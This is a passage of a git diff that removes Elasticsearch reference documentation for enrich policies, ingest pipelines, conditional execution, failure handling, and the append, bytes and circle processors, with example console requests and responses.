"enrich_fields": [ "location", "postal_code" ] - } -} ----- -// TEST[continued] - -Use the <> to create an -enrich index for the policy. - -[source,console] ----- -POST /_enrich/policy/postal_policy/_execute ----- -// TEST[continued] - -Use the <> to create an ingest pipeline. In -the pipeline, add an <> that includes: - -* Your enrich policy. -* The `field` of incoming documents used to match the geo_shape of documents - from the enrich index. -* The `target_field` used to store appended enrich data for incoming documents. - This field contains the `match_field` and `enrich_fields` specified in your - enrich policy. -* The `shape_relation`, which indicates how the processor matches geo_shapes in - incoming documents to geo_shapes in documents from the enrich index. See - <<_spatial_relations>> for valid options and more information. - -[source,console] ----- -PUT /_ingest/pipeline/postal_lookup -{ - "description": "Enrich postal codes", - "processors": [ - { - "enrich": { - "policy_name": "postal_policy", - "field": "geo_location", - "target_field": "geo_data", - "shape_relation": "INTERSECTS" - } - } - ] -} ----- -// TEST[continued] - -Use the ingest pipeline to index a document. The incoming document should -include the `field` specified in your enrich processor. - -[source,console] ----- -PUT /users/_doc/0?pipeline=postal_lookup -{ - "first_name": "Mardy", - "last_name": "Brown", - "geo_location": "POINT (13.5 52.5)" -} ----- -// TEST[continued] - -To verify the enrich processor matched and appended the appropriate field data, -use the <> to view the indexed document. - -[source,console] ----- -GET /users/_doc/0 ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "found": true, - "_index": "users", - "_type": "_doc", - "_id": "0", - "_version": 1, - "_seq_no": 55, - "_primary_term": 1, - "_source": { - "geo_data": { - "location": { - "type": "envelope", - "coordinates": [[13.0, 53.0], [14.0, 52.0]] - }, - "postal_code": "96598" - }, - "first_name": "Mardy", - "last_name": "Brown", - "geo_location": "POINT (13.5 52.5)" - } -} ----- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term":1/"_primary_term" : $body._primary_term/] - -//// -[source,console] --------------------------------------------------- -DELETE /_ingest/pipeline/postal_lookup -DELETE /_enrich/policy/postal_policy --------------------------------------------------- -// TEST[continued] -//// - -[role="xpack"] -[testenv="basic"] -[[match-enrich-policy-type]] -=== Example: Enrich your data based on exact values - -`match` <> match enrich data to incoming -documents based on an exact value, such as a email address or ID, using a -<>. - -The following example creates a `match` enrich policy that adds user name and -contact information to incoming documents based on an email address. It then -adds the `match` enrich policy to a processor in an ingest pipeline. - -Use the <> or <> to create a source index. - -The following index API request creates a source index and indexes a -new document to that index. - -[source,console] ----- -PUT /users/_doc/1?refresh=wait_for -{ - "email": "mardy.brown@asciidocsmith.com", - "first_name": "Mardy", - "last_name": "Brown", - "city": "New Orleans", - "county": "Orleans", - "state": "LA", - "zip": 70116, - "web": "mardy.asciidocsmith.com" -} ----- - -Use the put enrich policy API to create an enrich policy with the `match` -policy type. This policy must include: - -* One or more source indices -* A `match_field`, - the field from the source indices used to match incoming documents -* Enrich fields from the source indices you'd like to append to incoming - documents - -[source,console] ----- -PUT /_enrich/policy/users-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} ----- -// TEST[continued] - -Use the <> to create an -enrich index for the policy. - -[source,console] ----- -POST /_enrich/policy/users-policy/_execute ----- -// TEST[continued] - - -Use the <> to create an ingest pipeline. In -the pipeline, add an <> that includes: - -* Your enrich policy. -* The `field` of incoming documents used to match documents - from the enrich index. -* The `target_field` used to store appended enrich data for incoming documents. - This field contains the `match_field` and `enrich_fields` specified in your - enrich policy. - -[source,console] ----- -PUT /_ingest/pipeline/user_lookup -{ - "description" : "Enriching user details to messages", - "processors" : [ - { - "enrich" : { - "policy_name": "users-policy", - "field" : "email", - "target_field": "user", - "max_matches": "1" - } - } - ] -} ----- -// TEST[continued] - -Use the ingest pipeline to index a document. The incoming document should -include the `field` specified in your enrich processor. - -[source,console] ----- -PUT /my-index-00001/_doc/my_id?pipeline=user_lookup -{ - "email": "mardy.brown@asciidocsmith.com" -} ----- -// TEST[continued] - -To verify the enrich processor matched and appended the appropriate field data, -use the <> to view the indexed document. - -[source,console] ----- -GET /my-index-00001/_doc/my_id ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "found": true, - "_index": "my-index-00001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 55, - "_primary_term": 1, - "_source": { - "user": { - "email": "mardy.brown@asciidocsmith.com", - "first_name": "Mardy", - "last_name": "Brown", - "zip": 70116, - "city": "New Orleans", - "state": "LA" - }, - "email": "mardy.brown@asciidocsmith.com" - } -} ----- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term":1/"_primary_term" : $body._primary_term/] - -//// -[source,console] --------------------------------------------------- -DELETE /_ingest/pipeline/user_lookup -DELETE /_enrich/policy/users-policy --------------------------------------------------- -// TEST[continued] -//// diff --git a/docs/reference/ingest/ingest-node.asciidoc b/docs/reference/ingest/ingest-node.asciidoc deleted file mode 100644 index bbaed48b21e..00000000000 --- a/docs/reference/ingest/ingest-node.asciidoc +++ /dev/null @@ -1,908 +0,0 @@ -[[pipeline]] -== Pipeline Definition - -A pipeline is a definition of a series of <> that are to be executed -in the same order as they are declared. A pipeline consists of two main fields: a `description` -and a list of `processors`: - -[source,js] --------------------------------------------------- -{ - "description" : "...", - "processors" : [ ... ] -} --------------------------------------------------- -// NOTCONSOLE - -The `description` is a special field to store a helpful description of -what the pipeline does. - -The `processors` parameter defines a list of processors to be executed in -order. - -[[accessing-data-in-pipelines]] -== Accessing Data in Pipelines - -The processors in a pipeline have read and write access to documents that pass through the pipeline. -The processors can access fields in the source of a document and the document's metadata fields. - -[discrete] -[[accessing-source-fields]] -=== Accessing Fields in the Source -Accessing a field in the source is straightforward. You simply refer to fields by -their name. For example: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "my_field", - "value": 582.1 - } -} --------------------------------------------------- -// NOTCONSOLE - -On top of this, fields from the source are always accessible via the `_source` prefix: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "_source.my_field", - "value": 582.1 - } -} --------------------------------------------------- -// NOTCONSOLE - -[discrete] -[[accessing-metadata-fields]] -=== Accessing Metadata Fields -You can access metadata fields in the same way that you access fields in the source. This -is possible because Elasticsearch doesn't allow fields in the source that have the -same name as metadata fields. - -The following metadata fields are accessible by a processor: - -* `_index` -* `_type` -* `_id` -* `_routing` - -The following example sets the `_id` metadata field of a document to `1`: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "_id", - "value": "1" - } -} --------------------------------------------------- -// NOTCONSOLE - -You can access a metadata field's value by surrounding it in double -curly brackets `"{{ }}"`. For example, `{{_index}}` retrieves the name of a -document's index. - -WARNING: If you <> -document IDs, you cannot use the `{{_id}}` value in an ingest processor. {es} -assigns auto-generated `_id` values after ingest. - -[discrete] -[[accessing-ingest-metadata]] -=== Accessing Ingest Metadata Fields -Beyond metadata fields and source fields, ingest also adds ingest metadata to the documents that it processes. -These metadata properties are accessible under the `_ingest` key. Currently ingest adds the ingest timestamp -under the `_ingest.timestamp` key of the ingest metadata. The ingest timestamp is the time when Elasticsearch -received the index or bulk request to pre-process the document. - -Any processor can add ingest-related metadata during document processing. Ingest metadata is transient -and is lost after a document has been processed by the pipeline. Therefore, ingest metadata won't be indexed. - -The following example adds a field with the name `received`. The value is the ingest timestamp: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "received", - "value": "{{_ingest.timestamp}}" - } -} --------------------------------------------------- -// NOTCONSOLE - -Unlike Elasticsearch metadata fields, the ingest metadata field name `_ingest` can be used as a valid field name -in the source of a document. Use `_source._ingest` to refer to the field in the source document. Otherwise, `_ingest` -will be interpreted as an ingest metadata field. - -[discrete] -[[accessing-template-fields]] -=== Accessing Fields and Metafields in Templates -A number of processor settings also support templating. Settings that support templating can have zero or more -template snippets. A template snippet begins with `{{` and ends with `}}`. -Accessing fields and metafields in templates is exactly the same as via regular processor field settings. - -The following example adds a field named `field_c`. Its value is a concatenation of -the values of `field_a` and `field_b`. - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "field_c", - "value": "{{field_a}} {{field_b}}" - } -} --------------------------------------------------- -// NOTCONSOLE - -The following example uses the value of the `geoip.country_iso_code` field in the source -to set the index that the document will be indexed into: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "_index", - "value": "{{geoip.country_iso_code}}" - } -} --------------------------------------------------- -// NOTCONSOLE - -Dynamic field names are also supported. This example sets the field named after the -value of `service` to the value of the field `code`: - -[source,js] --------------------------------------------------- -{ - "set": { - "field": "{{service}}", - "value": "{{code}}" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[ingest-conditionals]] -== Conditional Execution in Pipelines - -Each processor allows for an optional `if` condition to determine if that -processor should be executed or skipped. The value of the `if` is a -<> script that needs to evaluate -to `true` or `false`. - -For example the following processor will <> the document -(i.e. not index it) if the input document has a field named `network_name` -and it is equal to `Guest`. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/drop_guests_network -{ - "processors": [ - { - "drop": { - "if": "ctx.network_name == 'Guest'" - } - } - ] -} --------------------------------------------------- - -Using that pipeline for an index request: - -[source,console] --------------------------------------------------- -POST test/_doc/1?pipeline=drop_guests_network -{ - "network_name" : "Guest" -} --------------------------------------------------- -// TEST[continued] - -Results in nothing indexed since the conditional evaluated to `true`. - -[source,console-result] --------------------------------------------------- -{ - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": -3, - "result": "noop", - "_shards": { - "total": 0, - "successful": 0, - "failed": 0 - } -} --------------------------------------------------- - - -[[ingest-conditional-nullcheck]] -=== Handling Nested Fields in Conditionals - -Source documents often contain nested fields. Care should be taken -to avoid NullPointerExceptions if the parent object does not exist -in the document. For example `ctx.a.b.c` can throw an NullPointerExceptions -if the source document does not have top level `a` object, or a second -level `b` object. - -To help protect against NullPointerExceptions, null safe operations should be used. -Fortunately, Painless makes {painless}/painless-operators-reference.html#null-safe-operator[null safe] -operations easy with the `?.` operator. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/drop_guests_network -{ - "processors": [ - { - "drop": { - "if": "ctx.network?.name == 'Guest'" - } - } - ] -} --------------------------------------------------- - -The following document will get <> correctly: - -[source,console] --------------------------------------------------- -POST test/_doc/1?pipeline=drop_guests_network -{ - "network": { - "name": "Guest" - } -} --------------------------------------------------- -// TEST[continued] - -Thanks to the `?.` operator the following document will not throw an error. -If the pipeline used a `.` the following document would throw a NullPointerException -since the `network` object is not part of the source document. - -[source,console] --------------------------------------------------- -POST test/_doc/2?pipeline=drop_guests_network -{ - "foo" : "bar" -} --------------------------------------------------- -// TEST[continued] - -//// -Hidden example assertion: -[source,console] --------------------------------------------------- -GET test/_doc/2 --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "_index": "test", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "found": true, - "_source": { - "foo": "bar" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] -//// - -The source document can also use dot delimited fields to represent nested fields. - -For example instead the source document defining the fields nested: - -[source,js] --------------------------------------------------- -{ - "network": { - "name": "Guest" - } -} --------------------------------------------------- -// NOTCONSOLE - -The source document may have the nested fields flattened as such: -[source,js] --------------------------------------------------- -{ - "network.name": "Guest" -} --------------------------------------------------- -// NOTCONSOLE - -If this is the case, use the <> -so that the nested fields may be used in a conditional. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/drop_guests_network -{ - "processors": [ - { - "dot_expander": { - "field": "network.name" - } - }, - { - "drop": { - "if": "ctx.network?.name == 'Guest'" - } - } - ] -} --------------------------------------------------- - -Now the following input document can be used with a conditional in the pipeline. - -[source,console] --------------------------------------------------- -POST test/_doc/3?pipeline=drop_guests_network -{ - "network.name": "Guest" -} --------------------------------------------------- -// TEST[continued] - -The `?.` operators works well for use in the `if` conditional -because the {painless}/painless-operators-reference.html#null-safe-operator[null safe operator] -returns null if the object is null and `==` is null safe (as well as many other -{painless}/painless-operators.html[painless operators]). - -However, calling a method such as `.equalsIgnoreCase` is not null safe -and can result in a NullPointerException. - -Some situations allow for the same functionality but done so in a null safe manner. -For example: `'Guest'.equalsIgnoreCase(ctx.network?.name)` is null safe because -`Guest` is always non null, but `ctx.network?.name.equalsIgnoreCase('Guest')` is not null safe -since `ctx.network?.name` can return null. - -Some situations require an explicit null check. In the following example there -is not null safe alternative, so an explicit null check is needed. - -[source,js] --------------------------------------------------- -{ - "drop": { - "if": "ctx.network?.name != null && ctx.network.name.contains('Guest')" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[ingest-conditional-complex]] -=== Complex Conditionals -The `if` condition can be more complex than a simple equality check. -The full power of the <> is available and -running in the {painless}/painless-ingest-processor-context.html[ingest processor context]. - -IMPORTANT: The value of ctx is read-only in `if` conditions. - -A more complex `if` condition that drops the document (i.e. not index it) -unless it has a multi-valued tag field with at least one value that contains the characters -`prod` (case insensitive). - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/not_prod_dropper -{ - "processors": [ - { - "drop": { - "if": "Collection tags = ctx.tags;if(tags != null){for (String tag : tags) {if (tag.toLowerCase().contains('prod')) { return false;}}} return true;" - } - } - ] -} --------------------------------------------------- - -The conditional needs to be all on one line since JSON does not -support new line characters. However, Kibana's console supports -a triple quote syntax to help with writing and debugging -scripts like these. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/not_prod_dropper -{ - "processors": [ - { - "drop": { - "if": """ - Collection tags = ctx.tags; - if(tags != null){ - for (String tag : tags) { - if (tag.toLowerCase().contains('prod')) { - return false; - } - } - } - return true; - """ - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -or it can be built with a stored script: - -[source,console] --------------------------------------------------- -PUT _scripts/not_prod -{ - "script": { - "lang": "painless", - "source": """ - Collection tags = ctx.tags; - if(tags != null){ - for (String tag : tags) { - if (tag.toLowerCase().contains('prod')) { - return false; - } - } - } - return true; - """ - } -} -PUT _ingest/pipeline/not_prod_dropper -{ - "processors": [ - { - "drop": { - "if": { "id": "not_prod" } - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -Either way, you can run it with: - -[source,console] --------------------------------------------------- -POST test/_doc/1?pipeline=not_prod_dropper -{ - "tags": ["application:myapp", "env:Stage"] -} --------------------------------------------------- -// TEST[continued] - -The document is <> since `prod` (case insensitive) -is not found in the tags. - -The following document is indexed (i.e. not dropped) since -`prod` (case insensitive) is found in the tags. - -[source,console] --------------------------------------------------- -POST test/_doc/2?pipeline=not_prod_dropper -{ - "tags": ["application:myapp", "env:Production"] -} --------------------------------------------------- -// TEST[continued] - -//// -Hidden example assertion: -[source,console] --------------------------------------------------- -GET test/_doc/2 --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "_index": "test", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_seq_no": 34, - "_primary_term": 1, - "found": true, - "_source": { - "tags": [ - "application:myapp", - "env:Production" - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] -//// - - - -The <> with verbose can be used to help build out -complex conditionals. If the conditional evaluates to false it will be -omitted from the verbose results of the simulation since the document will not change. - -Care should be taken to avoid overly complex or expensive conditional checks -since the condition needs to be checked for each and every document. - -[[conditionals-with-multiple-pipelines]] -=== Conditionals with the Pipeline Processor -The combination of the `if` conditional and the <> can result in a simple, -yet powerful means to process heterogeneous input. For example, you can define a single pipeline -that delegates to other pipelines based on some criteria. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/logs_pipeline -{ - "description": "A pipeline of pipelines for log files", - "version": 1, - "processors": [ - { - "pipeline": { - "if": "ctx.service?.name == 'apache_httpd'", - "name": "httpd_pipeline" - } - }, - { - "pipeline": { - "if": "ctx.service?.name == 'syslog'", - "name": "syslog_pipeline" - } - }, - { - "fail": { - "if": "ctx.service?.name != 'apache_httpd' && ctx.service?.name != 'syslog'", - "message": "This pipeline requires service.name to be either `syslog` or `apache_httpd`" - } - } - ] -} --------------------------------------------------- - -The above example allows consumers to point to a single pipeline for all log based index requests. -Based on the conditional, the correct pipeline will be called to process that type of data. - -This pattern works well with a <> defined in an index mapping -template for all indexes that hold data that needs pre-index processing. - -[[conditionals-with-regex]] -=== Conditionals with the Regular Expressions -The `if` conditional is implemented as a Painless script, which requires -{painless}//painless-regexes.html[explicit support for regular expressions]. - -`script.painless.regex.enabled: true` must be set in `elasticsearch.yml` to use regular -expressions in the `if` condition. - -If regular expressions are enabled, operators such as `=~` can be used against a `/pattern/` for conditions. - -For example: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/check_url -{ - "processors": [ - { - "set": { - "if": "ctx.href?.url =~ /^http[^s]/", - "field": "href.insecure", - "value": true - } - } - ] -} --------------------------------------------------- - -[source,console] --------------------------------------------------- -POST test/_doc/1?pipeline=check_url -{ - "href": { - "url": "http://www.elastic.co/" - } -} --------------------------------------------------- -// TEST[continued] - -Results in: - -//// -Hidden example assertion: -[source,console] --------------------------------------------------- -GET test/_doc/1 --------------------------------------------------- -// TEST[continued] -//// - -[source,console-result] --------------------------------------------------- -{ - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": 1, - "_seq_no": 60, - "_primary_term": 1, - "found": true, - "_source": { - "href": { - "insecure": true, - "url": "http://www.elastic.co/" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -Regular expressions can be expensive and should be avoided if viable -alternatives exist. - -For example in this case `startsWith` can be used to get the same result -without using a regular expression: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/check_url -{ - "processors": [ - { - "set": { - "if": "ctx.href?.url != null && ctx.href.url.startsWith('http://')", - "field": "href.insecure", - "value": true - } - } - ] -} --------------------------------------------------- - -[[handling-failure-in-pipelines]] -== Handling Failures in Pipelines - -In its simplest use case, a pipeline defines a list of processors that -are executed sequentially, and processing halts at the first exception. This -behavior may not be desirable when failures are expected. For example, you may have logs -that don't match the specified grok expression. Instead of halting execution, you may -want to index such documents into a separate index. - -To enable this behavior, you can use the `on_failure` parameter. The `on_failure` parameter -defines a list of processors to be executed immediately following the failed processor. -You can specify this parameter at the pipeline level, as well as at the processor -level. If a processor specifies an `on_failure` configuration, whether -it is empty or not, any exceptions that are thrown by the processor are caught, and the -pipeline continues executing the remaining processors. Because you can define further processors -within the scope of an `on_failure` statement, you can nest failure handling. - -The following example defines a pipeline that renames the `foo` field in -the processed document to `bar`. If the document does not contain the `foo` field, the processor -attaches an error message to the document for later analysis within -Elasticsearch. - -[source,js] --------------------------------------------------- -{ - "description" : "my first pipeline with handled exceptions", - "processors" : [ - { - "rename" : { - "field" : "foo", - "target_field" : "bar", - "on_failure" : [ - { - "set" : { - "field" : "error.message", - "value" : "field \"foo\" does not exist, cannot rename to \"bar\"" - } - } - ] - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The following example defines an `on_failure` block on a whole pipeline to change -the index to which failed documents get sent. - -[source,js] --------------------------------------------------- -{ - "description" : "my first pipeline with handled exceptions", - "processors" : [ ... ], - "on_failure" : [ - { - "set" : { - "field" : "_index", - "value" : "failed-{{ _index }}" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -Alternatively instead of defining behaviour in case of processor failure, it is also possible -to ignore a failure and continue with the next processor by specifying the `ignore_failure` setting. - -In case in the example below the field `foo` doesn't exist the failure will be caught and the pipeline -continues to execute, which in this case means that the pipeline does nothing. - -[source,js] --------------------------------------------------- -{ - "description" : "my first pipeline with handled exceptions", - "processors" : [ - { - "rename" : { - "field" : "foo", - "target_field" : "bar", - "ignore_failure" : true - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The `ignore_failure` can be set on any processor and defaults to `false`. - -[discrete] -[[accessing-error-metadata]] -=== Accessing Error Metadata From Processors Handling Exceptions - -You may want to retrieve the actual error message that was thrown -by a failed processor. To do so you can access metadata fields called -`on_failure_message`, `on_failure_processor_type`, `on_failure_processor_tag` and -`on_failure_pipeline` (in case an error occurred inside a pipeline processor). -These fields are only accessible from within the context of an `on_failure` block. - -Here is an updated version of the example that you -saw earlier. But instead of setting the error message manually, the example leverages the `on_failure_message` -metadata field to provide the error message. - -[source,js] --------------------------------------------------- -{ - "description" : "my first pipeline with handled exceptions", - "processors" : [ - { - "rename" : { - "field" : "foo", - "to" : "bar", - "on_failure" : [ - { - "set" : { - "field" : "error.message", - "value" : "{{ _ingest.on_failure_message }}" - } - } - ] - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - - -include::enrich.asciidoc[] - - -[[ingest-processors]] -== Processors - -All processors are defined in the following way within a pipeline definition: - -[source,js] --------------------------------------------------- -{ - "PROCESSOR_NAME" : { - ... processor configuration options ... - } -} --------------------------------------------------- -// NOTCONSOLE - -Each processor defines its own configuration parameters, but all processors have -the ability to declare `tag`, `on_failure` and `if` fields. These fields are optional. - -A `tag` is simply a string identifier of the specific instantiation of a certain -processor in a pipeline. The `tag` field does not affect the processor's behavior, -but is very useful for bookkeeping and tracing errors to specific processors. - -The `if` field must contain a script that returns a boolean value. If the script evaluates to `true` -then the processor will be executed for the given document otherwise it will be skipped. -The `if` field takes an object with the script fields defined in <> -and accesses a read only version of the document via the same `ctx` variable used by scripts in the -<>. - -[source,js] --------------------------------------------------- -{ - "set": { - "if": "ctx.foo == 'someValue'", - "field": "found", - "value": true - } -} --------------------------------------------------- -// NOTCONSOLE - -See <> to learn more about the `if` field and conditional execution. - -See <> to learn more about the `on_failure` field and error handling in pipelines. - -The <> will provide a per node list of what processors are available. - -Custom processors must be installed on all nodes. The put pipeline API will fail if a processor specified in a pipeline -doesn't exist on all nodes. If you rely on custom processor plugins make sure to mark these plugins as mandatory by adding -`plugin.mandatory` setting to the `config/elasticsearch.yml` file, for example: - -[source,yaml] --------------------------------------------------- -plugin.mandatory: ingest-attachment --------------------------------------------------- - -A node will not start if this plugin is not available. - -The <> can be used to fetch ingest usage statistics, globally and on a per -pipeline basis. Useful to find out which pipelines are used the most or spent the most time on preprocessing. - -[discrete] -=== Ingest Processor Plugins - -Additional ingest processors can be implemented and installed as Elasticsearch {plugins}/intro.html[plugins]. -See {plugins}/ingest.html[Ingest plugins] for information about the available ingest plugins. - -include::processors/append.asciidoc[] -include::processors/bytes.asciidoc[] -include::processors/circle.asciidoc[] -include::processors/convert.asciidoc[] -include::processors/csv.asciidoc[] -include::processors/date.asciidoc[] -include::processors/date-index-name.asciidoc[] -include::processors/dissect.asciidoc[] -include::processors/dot-expand.asciidoc[] -include::processors/drop.asciidoc[] -include::processors/enrich.asciidoc[] -include::processors/fail.asciidoc[] -include::processors/foreach.asciidoc[] -include::processors/geoip.asciidoc[] -include::processors/grok.asciidoc[] -include::processors/gsub.asciidoc[] -include::processors/html_strip.asciidoc[] -include::processors/inference.asciidoc[] -include::processors/join.asciidoc[] -include::processors/json.asciidoc[] -include::processors/kv.asciidoc[] -include::processors/lowercase.asciidoc[] -include::processors/pipeline.asciidoc[] -include::processors/remove.asciidoc[] -include::processors/rename.asciidoc[] -include::processors/script.asciidoc[] -include::processors/set.asciidoc[] -include::processors/set-security-user.asciidoc[] -include::processors/sort.asciidoc[] -include::processors/split.asciidoc[] -include::processors/trim.asciidoc[] -include::processors/uppercase.asciidoc[] -include::processors/url-decode.asciidoc[] -include::processors/user-agent.asciidoc[] diff --git a/docs/reference/ingest/processors/append.asciidoc b/docs/reference/ingest/processors/append.asciidoc deleted file mode 100644 index 839fec7e4ea..00000000000 --- a/docs/reference/ingest/processors/append.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[append-processor]] -=== Append processor -++++ -Append -++++ - - -Appends one or more values to an existing array if the field already exists and it is an array. -Converts a scalar to an array and appends one or more values to it if the field exists and it is a scalar. -Creates an array containing the provided values if the field doesn't exist. -Accepts a single value or an array of values. - -[[append-options]] -.Append Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to be appended to. Supports <>. -| `value` | yes | - | The value to be appended. Supports <>. -| `allow_duplicates` | no | true | If `false`, the processor does not append -values already present in the field. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "append": { - "field": "tags", - "value": ["production", "{{app}}", "{{owner}}"] - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/bytes.asciidoc b/docs/reference/ingest/processors/bytes.asciidoc deleted file mode 100644 index 5e8c4c461c1..00000000000 --- a/docs/reference/ingest/processors/bytes.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[bytes-processor]] -=== Bytes processor -++++ -Bytes -++++ - -Converts a human readable byte value (e.g. 1kb) to its value in bytes (e.g. 1024). If the field is an array of strings, all members of the array will be converted. - -Supported human readable units are "b", "kb", "mb", "gb", "tb", "pb" case insensitive. An error will occur if -the field is not a supported format or resultant value exceeds 2^63. - -[[bytes-options]] -.Bytes Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to convert -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "bytes": { - "field": "file.size" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/circle.asciidoc b/docs/reference/ingest/processors/circle.asciidoc deleted file mode 100644 index 852e903f041..00000000000 --- a/docs/reference/ingest/processors/circle.asciidoc +++ /dev/null @@ -1,166 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ingest-circle-processor]] -=== Circle processor -++++ -Circle -++++ - -Converts circle definitions of shapes to regular polygons which approximate them. - -[[circle-processor-options]] -.Circle Processor Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The string-valued field to trim whitespace from -| `target_field` | no | `field` | The field to assign the polygon shape to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `error_distance` | yes | - | The difference between the resulting inscribed distance from center to side and the circle's radius (measured in meters for `geo_shape`, unit-less for `shape`) -| `shape_type` | yes | - | which field mapping type is to be used when processing the circle: `geo_shape` or `shape` -include::common-options.asciidoc[] -|====== - - -image:images/spatial/error_distance.png[] - -[source,console] --------------------------------------------------- -PUT circles -{ - "mappings": { - "properties": { - "circle": { - "type": "geo_shape" - } - } - } -} - -PUT _ingest/pipeline/polygonize_circles -{ - "description": "translate circle to polygon", - "processors": [ - { - "circle": { - "field": "circle", - "error_distance": 28.0, - "shape_type": "geo_shape" - } - } - ] -} --------------------------------------------------- - -Using the above pipeline, we can attempt to index a document into the `circles` index. -The circle can be represented as either a WKT circle or a GeoJSON circle. The resulting -polygon will be represented and indexed using the same format as the input circle. WKT will -be translated to a WKT polygon, and GeoJSON circles will be translated to GeoJSON polygons. - -==== Example: Circle defined in Well Known Text - -In this example a circle defined in WKT format is indexed - -[source,console] --------------------------------------------------- -PUT circles/_doc/1?pipeline=polygonize_circles -{ - "circle": "CIRCLE (30 10 40)" -} - -GET circles/_doc/1 --------------------------------------------------- -// TEST[continued] - -The response from the above index request: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "circles", - "_type": "_doc", - "_id": "1", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "_source": { - "circle": "POLYGON ((30.000365257263184 10.0, 30.000111397193788 10.00034284530941, 29.999706043744222 10.000213571721195, 29.999706043744222 9.999786428278805, 30.000111397193788 9.99965715469059, 30.000365257263184 10.0))" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] - -==== Example: Circle defined in GeoJSON - -In this example a circle defined in GeoJSON format is indexed - -[source,console] --------------------------------------------------- -PUT circles/_doc/2?pipeline=polygonize_circles -{ - "circle": { - "type": "circle", - "radius": "40m", - "coordinates": [30, 10] - } -} - -GET circles/_doc/2 --------------------------------------------------- -// TEST[continued] - -The response from the above index request: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "circles", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "_source": { - "circle": { - "coordinates": [ - [ - [30.000365257263184, 10.0], - [30.000111397193788, 10.00034284530941], - [29.999706043744222, 10.000213571721195], - [29.999706043744222, 9.999786428278805], - [30.000111397193788, 9.99965715469059], - [30.000365257263184, 10.0] - ] - ], - "type": "Polygon" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] - -[[circle-processor-notes]] -==== Notes on Accuracy - -Accuracy of the polygon that represents the circle is defined as `error_distance`. The smaller this -difference is, the closer to a perfect circle the polygon is. - -Below is a table that aims to help capture how the radius of the circle affects the resulting number of sides -of the polygon given different inputs. - -The minimum number of sides is `4` and the maximum is `1000`. - -[[circle-processor-accuracy]] -.Circle Processor Accuracy -[options="header"] -|====== -| error_distance | radius in meters | number of sides of polygon -| 1.00 | 1.0 | 4 -| 1.00 | 10.0 | 14 -| 1.00 | 100.0 | 45 -| 1.00 | 1000.0 | 141 -| 1.00 | 10000.0 | 445 -| 1.00 | 100000.0 | 1000 -|====== diff --git a/docs/reference/ingest/processors/common-options.asciidoc b/docs/reference/ingest/processors/common-options.asciidoc deleted file mode 100644 index dcf8b63630b..00000000000 --- a/docs/reference/ingest/processors/common-options.asciidoc +++ /dev/null 